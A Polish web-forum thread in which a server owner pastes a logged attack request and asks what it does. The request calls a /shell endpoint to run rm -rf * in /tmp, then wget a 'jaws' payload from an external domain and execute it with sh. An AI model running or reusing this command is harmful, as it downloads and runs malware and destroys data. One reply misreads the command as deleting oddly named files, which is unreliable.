 Co to może zrobić ? |
| Co to może zrobić ? |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 328 Pomógł: 3 Dołączył: 10.07.2016 Skąd: UK-raine Ostrzeżenie: (0%) 
 |
Hel-lo wszystkim
Jeśli macie a pewnie niektórzy maja z pewnościa .. co to może być ? GET /shell?cd+/tmp;rm+-rf+*;wget+ kreekxassa.ml/jaws;sh+/tmp/jaws" 400 0 "-" "-" wyglada na formę ataku ale moje doświadczenie w temacie "server security" jest stosunkowo niewielkie. Faktem jest, że po tym mój serwer przez kilk aminut był całkowicie martwy .... Macie jakieś wytłumaczenie ? Pozdrówka phpamator Ten post edytował phpamator 11.07.2022, 09:18:54 |
 |
 
|
 |
|
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 623 Pomógł: 144 Dołączył: 22.12.2010 Ostrzeżenie: (0%)
|
Próba wykonania komend systemowych przez skrypt 'shell' tak jak nospor wyżej pisał, a dokładniej to atakujący chciał usunac jakies pliki z koncowka *.wget, plik jaws;sh z katalogu kreekxassa.ml i plik jaws w /tmp, sprawdz profilaktycznie czy nie masz jakichs sladow z tymi plikami, jesli masz to masz zainfekowaną stronę i mozliwe ze caly serwer.
|
|
|
|
phpamator Co to może zrobić ? 11.07.2022, 09:16:55 
nospor wyglada na to ze twoja strona ma routing o nazwie ... 11.07.2022, 09:52:26 gino Podpytałem trochę naszych adminów bo już gdzieś mi... 15.07.2022, 19:50:37 StrefaPi ale tu nie ma co się przejmować zapytanie według t... 17.07.2022, 07:06:15 gino Jak dostaniesz ileśtam tysięcy takich wywołań w kr... 17.07.2022, 07:50:37 StrefaPi fail2ban? 17.07.2022, 09:16:12 
gino fail2ban nie chroni przed atakami brutal force roz... 17.07.2022, 18:22:58  |
|
Aktualny czas: 10.10.2025 - 06:49 |
